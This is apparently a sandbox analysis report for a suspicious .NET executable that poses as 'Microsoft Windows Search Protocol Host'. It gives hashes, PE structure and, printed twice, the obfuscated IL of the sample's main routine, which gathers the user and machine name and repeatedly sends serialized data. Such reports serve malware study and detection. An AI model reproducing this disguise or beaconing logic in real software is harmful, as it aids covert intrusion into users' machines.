Suspicious
Suspect

237c617acd3dee5041fbc6318389429d

PE Executable
|
MD5: 237c617acd3dee5041fbc6318389429d
|
Size: 472.38 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Very high

Hash
 Hash Value
MD5
237c617acd3dee5041fbc6318389429d
Sha1
9a99556f0d1a2567764d1f2feafdfe35ca79c76f
Sha256
d051a2248953ef9e62d136641d3fba9ae22846ea8f00f8823e18b3e7c5c219b7
Sha384
fb33875b7ccaff2b6de67335e7e90022b8c7ae957c77271a1bcdf6ff35542667683a5e8b95db83c52401d2fb6e57437f
Sha512
9e4a4c273d9cb7a77b873501cb8e719685b2fd1c5ed1d99e802e83124ab0265409670055031b484439055b385d10ef1b8714dacf50debb2fd2a3340ea008a598
SSDeep
6144:pAW/pRiPQ+u74n4z88IUPimODSsqLggjz2tLlpj46y2l40+Sp9ua587LvfP2wFbD:egRiu7jzrpPydjgjSm0+SbjSnnX+u
TLSH
7BA43A147FA98E08D550293E429E5608CBEAD1F121326307370AEFA59D45DDEEE2C3DB

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
237c617acd3dee5041fbc6318389429d
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
RT_GROUP_CURSOR4
ID:0001
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
ntop5tf66jvj1a7t5fxe
amchz67ini
Informations
Name
 Value
Module Name

Microsoft Windows Search Protocol Host
Full Name

Microsoft Windows Search Protocol Host
EntryPoint

System.Void gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::voPMdSqNotFUQGLyrloYYh(System.String[])
Scope Name

Microsoft Windows Search Protocol Host
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Microsoft Windows Search Protocol Host
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.7.2
Total Strings

456
Main Method

System.Void gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::voPMdSqNotFUQGLyrloYYh(System.String[])
Main IL Instruction Count

182
Main IL

ldc.r8 2038 stloc V_3 br IL_004F: br IL_0012 nop <null> ldloc V_3 ldc.r8 2038 ceq <null> brfalse IL_0035: nop nop <null> ldc.r8 2049 stloc V_3 nop <null> ldloc V_3 ldc.r8 2049 ceq <null> brfalse IL_004F: br IL_0012 br IL_0054: call System.Void gjrXvOxdPNi.tpuCfQSWXJdg::jlpvYJXRplea() br IL_0012: nop call System.Void gjrXvOxdPNi.tpuCfQSWXJdg::jlpvYJXRplea() call System.Void gjrXvOxdPNi.WlbOHFCPSUBakbYvpyMsKhThF::iYJorPDEIRhovxe() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::VSvmQrRcpWJufKlOor call System.String gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::xBhEsbcFBSQacToVyspyCKgY() call System.String HwDwBHqbPq.HzVBJIixYDaxHKqGvzIfWoD::ppSGEhibTeZcBUPGf(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_007C: ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::SXVFXThaLrkkePDGBiNvj call System.Void JtfhJhplVLbZ.bVywbtvQcBGnqEBomSFDx::mpXZpmcuQdakCEdBLXpQNmjU() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::SXVFXThaLrkkePDGBiNvj call System.Boolean HwDwBHqbPq.ZsYBrIXQtTtGdFNohOovtHoqM::FCHdkDyAfNPxVMIipNP(System.String) brtrue IL_0090: call System.Void HwDwBHqbPq.wenXjnqDzVJZSdxrbazBvr::lCsEYvuIsRqpeCpYH() leave IL_02BE: ret call System.Void HwDwBHqbPq.wenXjnqDzVJZSdxrbazBvr::lCsEYvuIsRqpeCpYH() call System.Void SlfqvNMcCJRvxssuj.aKfMoAJHWbwEZ::xkDbplOjLFaEjTHWcpO() ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa ldfld System.Boolean gjrXvOxdPNi.btGfdTiSbIilLw::ldwgIaATEbgfTmrZSLejvrPon brtrue IL_02A9: call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::JVostcYQJqHEPTenBh() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::BzVgFJhRXigDjBVILXxP call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::ODxuaTkOwKvKNWrQKOee() newarr System.Char dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::dOqBSvzwOAWMa() call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::XlljRgRBYIpsjjHM() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random SlfqvNMcCJRvxssuj.aKfMoAJHWbwEZ::jddXvINVvzhyVNaJMzu ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::qaVlpHsHYkRhJYynC() newarr System.Char dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::eYeNytcpiLaLQpBc() call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::lEjhesbsvAUOjqFhOdn() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::dccIzYhhMUcfhtNiTmAfDUCt() ldelem.ref <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::azVVeBMOiCJc() newarr System.Char dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::iFLugaXohpdWNccHqI() call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::jAYZMMhTQRyrEFsEuU() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa callvirt System.Void gjrXvOxdPNi.btGfdTiSbIilLw::LyNPSrwKCt() ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa ldloc V_1 call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::obVTtJryQYjG() ldelem.ref <null> ldloc V_2 ldsfld System.Random SlfqvNMcCJRvxssuj.aKfMoAJHWbwEZ::jddXvINVvzhyVNaJMzu ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> callvirt System.Void gjrXvOxdPNi.btGfdTiSbIilLw::kxetdDHWqeRVVDJQlbIDO(System.String,System.String) ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa ldfld System.Boolean gjrXvOxdPNi.btGfdTiSbIilLw::ldwgIaATEbgfTmrZSLejvrPon brfalse IL_02A9: call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::JVostcYQJqHEPTenBh() ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::tjtZJgzizHGWjyYRVXinhUy() newarr System.Object dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::gfPUNQuhLGxVMT() call System.String gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::KMpnZZExMUzEKwmGCTChc() call System.String HwDwBHqbPq.HzVBJIixYDaxHKqGvzIfWoD::ppSGEhibTeZcBUPGf(System.String) stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::NUapUPxKKShvAASJYkgseRfU() call System.String gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::krhYeWxumV() call System.String HwDwBHqbPq.HzVBJIixYDaxHKqGvzIfWoD::ppSGEhibTeZcBUPGf(System.String) stelem.ref <null> call System.Byte[] gjrXvOxdPNi.xaEcrbolGSCqTrszMht::mCfxOgBDEVxRhTIMbr(System.Object[]) callvirt System.Void gjrXvOxdPNi.btGfdTiSbIilLw::aiSIvrCascjkrQEJPSAFyfpO(System.Byte[]) ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa newobj System.Void nmrftPuzfSWmAsBFqbHBXPu.HWbeMwLTyZOjBzMDhOGnEBX::.ctor(gjrXvOxdPNi.btGfdTiSbIilLw) stfld nmrftPuzfSWmAsBFqbHBXPu.HWbeMwLTyZOjBzMDhOGnEBX gjrXvOxdPNi.btGfdTiSbIilLw::qYlAzfHkvzRENCQmiWJGoIiAe ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa newobj System.Void JtfhJhplVLbZ.HamusghxzAYNRW::.ctor(gjrXvOxdPNi.btGfdTiSbIilLw) stfld JtfhJhplVLbZ.HamusghxzAYNRW gjrXvOxdPNi.btGfdTiSbIilLw::DhCtOHsLkchDcAYirsHNxc ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::MYLcBDECdVSHfexjVFBg() newarr System.Object dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::tgsxYkgaQwpFGHql() call System.String gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::RiOmScsMdQzo() call System.String HwDwBHqbPq.HzVBJIixYDaxHKqGvzIfWoD::ppSGEhibTeZcBUPGf(System.String) stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::IOctXfzCtGiJILdoNSrS() call System.Byte[] SlfqvNMcCJRvxssuj.aKfMoAJHWbwEZ::lfoQYbRpNeL() stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::cTYcMYdBYXGxnwmDbVB() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::KMlMVtYMlQJieeCblMFfOgxhG stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::ufexQIkMRtoyTCgvDRLHWAU() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::tLuQuiWfKazYdaiafFAL stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::cLUPqklxqZkxobLDnQkf() call System.String System.Environment::get_UserName() call System.String gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::nwDrAqdqKHcxFAv() call System.String HwDwBHqbPq.HzVBJIixYDaxHKqGvzIfWoD::ppSGEhibTeZcBUPGf(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::HekQqzKKuWuKvVEnVVgH() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::BOGftROkPSXMcylgcTdvAUtM stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::ItSiHcFHTFPpAUhjyzkbnwC() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::VlUGIhfYmdOZEI stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::nsGGQSuDYrzkShjXECaReV() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::ROhHMMrVVLYbwK stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::AXDWWvfELrcvPWzrAKMQIUwR() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::pkiXlaWTXAAyEAQihJu stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::QNXkVlLRwFjMvYI() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::hUuPYgtdGlsoqUXGYKOdlmmA stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::notpmTBEKZHSEngamFFiHTp() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::LKQBpnPirmjTkPIE stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::RdSQQeFlEYV() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::ggdOBrkpzghBMld stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::DbewMSavesNJZIapSal() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::RdCEqJwBcUdRqCbJjQNfQB stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::ymYIBkofUVOgRzWK() call System.String SlfqvNMcCJRvxssuj.aKfMoAJHWbwEZ::JMYkiDUqRiSZLwWNskd() stelem.ref <null> call System.Byte[] gjrXvOxdPNi.xaEcrbolGSCqTrszMht::mCfxOgBDEVxRhTIMbr(System.Object[]) callvirt System.Void gjrXvOxdPNi.btGfdTiSbIilLw::aiSIvrCascjkrQEJPSAFyfpO(System.Byte[]) call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::JVostcYQJqHEPTenBh() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_009A: ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa pop <null> leave IL_02BE: ret ret <null>
Module Name

Microsoft Windows Search Protocol Host
Full Name

Microsoft Windows Search Protocol Host
EntryPoint

System.Void gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::voPMdSqNotFUQGLyrloYYh(System.String[])
Scope Name

Microsoft Windows Search Protocol Host
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Microsoft Windows Search Protocol Host
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.7.2
Total Strings

456
Main Method

System.Void gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::voPMdSqNotFUQGLyrloYYh(System.String[])
Main IL Instruction Count

182
Main IL

ldc.r8 2038 stloc V_3 br IL_004F: br IL_0012 nop <null> ldloc V_3 ldc.r8 2038 ceq <null> brfalse IL_0035: nop nop <null> ldc.r8 2049 stloc V_3 nop <null> ldloc V_3 ldc.r8 2049 ceq <null> brfalse IL_004F: br IL_0012 br IL_0054: call System.Void gjrXvOxdPNi.tpuCfQSWXJdg::jlpvYJXRplea() br IL_0012: nop call System.Void gjrXvOxdPNi.tpuCfQSWXJdg::jlpvYJXRplea() call System.Void gjrXvOxdPNi.WlbOHFCPSUBakbYvpyMsKhThF::iYJorPDEIRhovxe() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::VSvmQrRcpWJufKlOor call System.String gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::xBhEsbcFBSQacToVyspyCKgY() call System.String HwDwBHqbPq.HzVBJIixYDaxHKqGvzIfWoD::ppSGEhibTeZcBUPGf(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_007C: ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::SXVFXThaLrkkePDGBiNvj call System.Void JtfhJhplVLbZ.bVywbtvQcBGnqEBomSFDx::mpXZpmcuQdakCEdBLXpQNmjU() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::SXVFXThaLrkkePDGBiNvj call System.Boolean HwDwBHqbPq.ZsYBrIXQtTtGdFNohOovtHoqM::FCHdkDyAfNPxVMIipNP(System.String) brtrue IL_0090: call System.Void HwDwBHqbPq.wenXjnqDzVJZSdxrbazBvr::lCsEYvuIsRqpeCpYH() leave IL_02BE: ret call System.Void HwDwBHqbPq.wenXjnqDzVJZSdxrbazBvr::lCsEYvuIsRqpeCpYH() call System.Void SlfqvNMcCJRvxssuj.aKfMoAJHWbwEZ::xkDbplOjLFaEjTHWcpO() ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa ldfld System.Boolean gjrXvOxdPNi.btGfdTiSbIilLw::ldwgIaATEbgfTmrZSLejvrPon brtrue IL_02A9: call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::JVostcYQJqHEPTenBh() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::BzVgFJhRXigDjBVILXxP call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::ODxuaTkOwKvKNWrQKOee() newarr System.Char dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::dOqBSvzwOAWMa() call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::XlljRgRBYIpsjjHM() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random SlfqvNMcCJRvxssuj.aKfMoAJHWbwEZ::jddXvINVvzhyVNaJMzu ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::qaVlpHsHYkRhJYynC() newarr System.Char dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::eYeNytcpiLaLQpBc() call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::lEjhesbsvAUOjqFhOdn() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::dccIzYhhMUcfhtNiTmAfDUCt() ldelem.ref <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::azVVeBMOiCJc() newarr System.Char dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::iFLugaXohpdWNccHqI() call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::jAYZMMhTQRyrEFsEuU() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa callvirt System.Void gjrXvOxdPNi.btGfdTiSbIilLw::LyNPSrwKCt() ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa ldloc V_1 call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::obVTtJryQYjG() ldelem.ref <null> ldloc V_2 ldsfld System.Random SlfqvNMcCJRvxssuj.aKfMoAJHWbwEZ::jddXvINVvzhyVNaJMzu ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> callvirt System.Void gjrXvOxdPNi.btGfdTiSbIilLw::kxetdDHWqeRVVDJQlbIDO(System.String,System.String) ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa ldfld System.Boolean gjrXvOxdPNi.btGfdTiSbIilLw::ldwgIaATEbgfTmrZSLejvrPon brfalse IL_02A9: call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::JVostcYQJqHEPTenBh() ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::tjtZJgzizHGWjyYRVXinhUy() newarr System.Object dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::gfPUNQuhLGxVMT() call System.String gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::KMpnZZExMUzEKwmGCTChc() call System.String HwDwBHqbPq.HzVBJIixYDaxHKqGvzIfWoD::ppSGEhibTeZcBUPGf(System.String) stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::NUapUPxKKShvAASJYkgseRfU() call System.String gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::krhYeWxumV() call System.String HwDwBHqbPq.HzVBJIixYDaxHKqGvzIfWoD::ppSGEhibTeZcBUPGf(System.String) stelem.ref <null> call System.Byte[] gjrXvOxdPNi.xaEcrbolGSCqTrszMht::mCfxOgBDEVxRhTIMbr(System.Object[]) callvirt System.Void gjrXvOxdPNi.btGfdTiSbIilLw::aiSIvrCascjkrQEJPSAFyfpO(System.Byte[]) ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa newobj System.Void nmrftPuzfSWmAsBFqbHBXPu.HWbeMwLTyZOjBzMDhOGnEBX::.ctor(gjrXvOxdPNi.btGfdTiSbIilLw) stfld nmrftPuzfSWmAsBFqbHBXPu.HWbeMwLTyZOjBzMDhOGnEBX gjrXvOxdPNi.btGfdTiSbIilLw::qYlAzfHkvzRENCQmiWJGoIiAe ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa newobj System.Void JtfhJhplVLbZ.HamusghxzAYNRW::.ctor(gjrXvOxdPNi.btGfdTiSbIilLw) stfld JtfhJhplVLbZ.HamusghxzAYNRW gjrXvOxdPNi.btGfdTiSbIilLw::DhCtOHsLkchDcAYirsHNxc ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::MYLcBDECdVSHfexjVFBg() newarr System.Object dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::tgsxYkgaQwpFGHql() call System.String gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::RiOmScsMdQzo() call System.String HwDwBHqbPq.HzVBJIixYDaxHKqGvzIfWoD::ppSGEhibTeZcBUPGf(System.String) stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::IOctXfzCtGiJILdoNSrS() call System.Byte[] SlfqvNMcCJRvxssuj.aKfMoAJHWbwEZ::lfoQYbRpNeL() stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::cTYcMYdBYXGxnwmDbVB() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::KMlMVtYMlQJieeCblMFfOgxhG stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::ufexQIkMRtoyTCgvDRLHWAU() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::tLuQuiWfKazYdaiafFAL stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::cLUPqklxqZkxobLDnQkf() call System.String System.Environment::get_UserName() call System.String gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::nwDrAqdqKHcxFAv() call System.String HwDwBHqbPq.HzVBJIixYDaxHKqGvzIfWoD::ppSGEhibTeZcBUPGf(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::HekQqzKKuWuKvVEnVVgH() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::BOGftROkPSXMcylgcTdvAUtM stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::ItSiHcFHTFPpAUhjyzkbnwC() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::VlUGIhfYmdOZEI stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::nsGGQSuDYrzkShjXECaReV() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::ROhHMMrVVLYbwK stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::AXDWWvfELrcvPWzrAKMQIUwR() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::pkiXlaWTXAAyEAQihJu stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::QNXkVlLRwFjMvYI() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::hUuPYgtdGlsoqUXGYKOdlmmA stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::notpmTBEKZHSEngamFFiHTp() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::LKQBpnPirmjTkPIE stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::RdSQQeFlEYV() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::ggdOBrkpzghBMld stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::DbewMSavesNJZIapSal() ldsfld System.String gjrXvOxdPNi.tpuCfQSWXJdg::RdCEqJwBcUdRqCbJjQNfQB stelem.ref <null> dup <null> call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::ymYIBkofUVOgRzWK() call System.String SlfqvNMcCJRvxssuj.aKfMoAJHWbwEZ::JMYkiDUqRiSZLwWNskd() stelem.ref <null> call System.Byte[] gjrXvOxdPNi.xaEcrbolGSCqTrszMht::mCfxOgBDEVxRhTIMbr(System.Object[]) callvirt System.Void gjrXvOxdPNi.btGfdTiSbIilLw::aiSIvrCascjkrQEJPSAFyfpO(System.Byte[]) call System.Int32 gTLVaxELikWw.RLCYTEceaNFLVCOPnTIoqP::JVostcYQJqHEPTenBh() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_009A: ldsfld gjrXvOxdPNi.btGfdTiSbIilLw gjrXvOxdPNi.FYRwYyZPkLSByCjEDoMFoyLcq::jWArgloWYa pop <null> leave IL_02BE: ret ret <null>
237c617acd3dee5041fbc6318389429d (472.38 KB)
File Structure
237c617acd3dee5041fbc6318389429d
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:0
RT_GROUP_CURSOR4
ID:0001
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
ntop5tf66jvj1a7t5fxe
amchz67ini
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙